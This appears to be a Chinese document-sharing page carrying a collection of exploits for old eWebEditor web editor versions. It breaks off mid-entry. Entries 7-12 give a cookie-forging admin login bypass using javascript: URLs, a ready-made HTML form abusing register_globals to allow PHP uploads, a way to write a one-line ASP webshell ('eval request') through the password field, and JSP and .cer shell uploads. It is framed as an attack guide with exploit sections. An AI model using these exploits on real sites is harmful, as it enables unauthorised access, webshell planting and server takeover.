- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
编辑器漏洞合集
ewebeditor:7、eWebEditor2.8.0最终版删除任意文件漏洞:此漏洞存在于Example\NewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须登陆可以直接进入。EXP:删除文件漏洞一般是配合其他漏洞使用的,比如目录遍历!8、PHP ≥ 3.0~3.8与asp 2.8版 PHP/ASP…后台通杀漏洞:进入后台/eWebEditor/admin/login.php,随便输入一个用户和密码,会提示出错了.这时候你清空浏览器的url,然后输入javascript:alert(document.cookie=adminuser=+escape(admin));javascript:alert(document.cookie=adminpass=+escape(admin));javascript:alert(document.cookie=admindj=+escape(1));而后三次回车,清空浏览器的URL,现在输入一些平常访问不到的文件如../ewebeditor/admin/default.php,就会直接进去。9、ewebeditor php v3.8 or older version任意文件上传漏洞:此版本将所有的风格配置信息保存为一个数组$aStyle,在php.ini配置register_global为on的情况下我们可以任意添加自己喜欢的风格,并定义上传类型。攻击利用:EXP:form action= method=post enctype=multipart/form-data INPUT TYPE=hidden name=MAX_FILE_SIZE value=512000 URL:input type=text name=url value=10/eWebEditor/ size=100br INPUT TYPE=hidden name=aStyle[12] value=toby57|||gray|||red|||../uploadfile /|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh- cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋 体||||||0|||jpg|jpeg|||300|||FFFFFF|||1 file:input type=file name=uploadfilebr input type=button value=submit onclick=fsubmit() /formbr script function fsubmit(){ form = document.forms[0]; form.action = form.url.value+php/upload.php?action=savetype=FILEstyle=toby57language=en; alert(form.action); form.submit(); } /script10、eWebEditor 2.8 商业版插一句话木马:登陆后台,点击修改密码---新密码设置为??1:eval request(h)’设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.11、ewebeditor jsp 1.4以下版本上传漏洞:第一个是使用savefile.jsp来进行文件上传操作.直接上传一个JSPShell另一个版本可能是被人修改过,把代码转成了servlet,不能看到代码, 但是利用方法却大同小异。我们先找一个1.4版本以下的ewebeditor JSP上传页面,选择好一个JSPShell。这个ewebeditor是没有提交按钮的,所以这里涉及到一个小技巧,就是在上传的对话框中敲下回车,大 约过半分钟,就可以查看网页的源文件找webshell地址。12、eWebEditorNet upload.aspx 上传漏洞:WebEditorNet 主要是一个upload.aspx文件存在上传漏洞。攻击利用默认上传地址:/ewebeditornet/upload.aspx 可以直接上传一个cer的
文档评论(0)